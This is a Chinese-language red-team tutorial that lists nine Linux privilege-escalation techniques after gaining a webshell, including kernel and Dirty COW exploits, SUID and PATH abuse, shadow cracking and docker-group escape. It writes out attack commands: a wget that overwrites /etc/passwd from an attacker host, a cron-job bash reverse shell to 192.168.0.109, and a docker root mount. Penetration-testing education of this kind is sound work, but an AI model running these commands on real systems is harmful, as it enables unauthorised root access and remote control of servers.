HW之红队常见Linux的几种提权方法

零基础学黑客，搜索公众号：白帽子左一

作者：掌控安全—杰斯

前言

HW即将开始，不管是 Windows 提权还是 Linux 提权，方法都非常之多，实际情况下，还是需要根据对应的情况选择对应的提权方法,今天就Linux常见的几种提权方式做个整理. 想要复习windows提权上期分享过，点击查看图片：HW之红队常见Windows的几种提权方法、 HW之红队常见Windows的几种权限维持

Linux常见的几种提权方法

提权，提高自己在服务器中的权限，主要针对网站入侵过程中，当渗透某一网站时，通过各种漏洞提升WEBSHELL权限以夺得该服务器权限，通常提权是把普通用户的权限提升到管理员权限或者系统权限，在渗透测试过程中，拿到一个webshell之后，一般来说，我们的权限都是目标服务器中间件的权限。

这个时候就需要利用各种漏洞来提升自己的权限，从而能够获得对目标服务器的控制。

1.内核溢出提权

简介
利用堆栈溢出漏洞，根据当前系统 寻找对应的漏洞的exp 使用exp对其进行提权。

复现
第一步：查看目标系统的相关信息

uname -a #查看内核/操作系统/cpu信息

cat /proc/version #查看系统信息

cat /etc/issue #查看操作系统版本

lsb_release -a #查询系统版本等信息

第二步：使用searchsploit工具寻找对应的exp

searchsploit -t 3.19

searchsploit -x linux/local/37292.c

第三步：让目标机器远程下载exp文件

第四步：将exp文件进行编译

第五步：执行exp文件，提权成功

2.脏牛提权 CVE-2016-5195

简介
该漏洞是 Linux 内核的内存子系统在处理写时拷贝（Copy-on-Write）时存在条件竞争漏洞， 导致可以破坏私有只读内存映射。

黑客可以在获取低权限的的本地用户后，利用此漏洞获取 其他只读内存映射的写权限，进一步获取 root 权限。

exp下载 https://github.com/Brucetg/DirtyCow-EXP

复现
第一步：查看目标系统信息

第二步：使用脏牛的exp工具

第三步：验证，直接查看密码文件，提权成功

3.Linux suid提权

简介

SUID是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。

也就是如果ROOT用户给某个可执行文件加了S权限，那么该执行程序运行的时候将拥有ROOT权限。

复现过程
第一步：发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000-print2>/dev/null

find / -user root -perm -4000-exec ls -ldb {} \;

第二步：利用带s的文件执行本地sh’shell

ps：常见的suid提权文件：nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

4.passwd提权

简介
基础知识/etc/passwd: 文件中的详细信息格式

复现
第一步：通过OpenSSL命令，生成一个新的用户oooohack，密码为hack123

openssl passwd -1 -salt oooohacker hack123 -> $1$oooohacker$4o50Z4aoUGaLMC0Rg4Io40

将/etc/passwd文件内容复制出来，然后将第一步的结果进行追加到passwd文件中

第二步：让目标远程下载文件，并覆盖原先的passwd文件

wget http://192.168.0.134/passwd -O /etc/passwd

第三步：切换用户，提权成功

5.ssh密钥提权

简介
ssh是一种加密的网络传输协议。可在不安全的网络中为网络服务提供安全的传输环境。

SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。

SSH最常见的用途是远程登录系统，人们通常利用SSH来传输命令行界面和远程执行命令。

使用频率最高的场合类Unix系统，但是Windows操作系统也能有限度地使用SSH。

2015年，微软宣布将在未来的操作系统中提供原生SSH协议支持，Windows 10 1809 版本已提供可手动安装的 OpenSSH工具。总的来说是一个传输协议，默认端口22

复现
第一步：cat /etc/passwd | grep bash # 过滤出含bash的用户

第二步：ls /home/web1 # 查看用户目录下的文件，寻找.ssh

第三步：进入.ssh，对比authrizid_keys和id_rsa.pub，若一致则说明公钥相同

第四步：将公钥对应的私钥文件复制

第五步：保存，并且设置权限

第六步：利用ssh直接进行远程登陆，提权成功

6.环境劫持提权

简介
环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令

复现过程
第一步：寻找suid文件

find / -perm -u=s -type f 2>/dev/null

第二步：查看suid文件里面执行的是哪些命令，要能够被我们所利用，比如ps命令

第三步：新建一个文件，文件内容为：/bin/bash，文件名是ps，设置环境变量的改变，提权成功

7.john破解shadow root密文登录提权

简介
需要一定的权限，将shodow文件中的root密文复制到一个新的文件中，使用工具破解即可。

复现过程
第一步：直接使用工具

8.Ubuntu计划任务反弹shell提权

简介
利用计划任务，和windows里面的开机启动任务类似。

复现过程
第一步：当获取一个linux普通用户的时，查看计划任务

第二步：crontab -l 查看当前用户的任务

第三步：tail -f /var/log/syslog，查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

第四步：更改cleanup.py文件里面的内容，做一个反弹shell。提权成功
bash -i >& /dev/tcp/192.168.0.109/6666 0>&1

9.docker 提权

简介
docker运行的所有命令都是需要sudo来运行，那是因为docker需要root权限才能跑。

Docker监护进程有一个特性，它能被允许访问root用户或者是在docker组里面的所有用户。

这就意味着，有docker 组的权限就如同到root的访问权，而且不需要知道密码。

复现
第一步：查看目标机器是否使用了docker

cat linux.txt | grep docker

第二步：查询当前用户信息和组信息，查询是否存在docker组

第三步：利用docker，将mnt目录挂载到宿主的根目录，提权成功
docker run -v /:/mnt -it alpine

申明：本号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.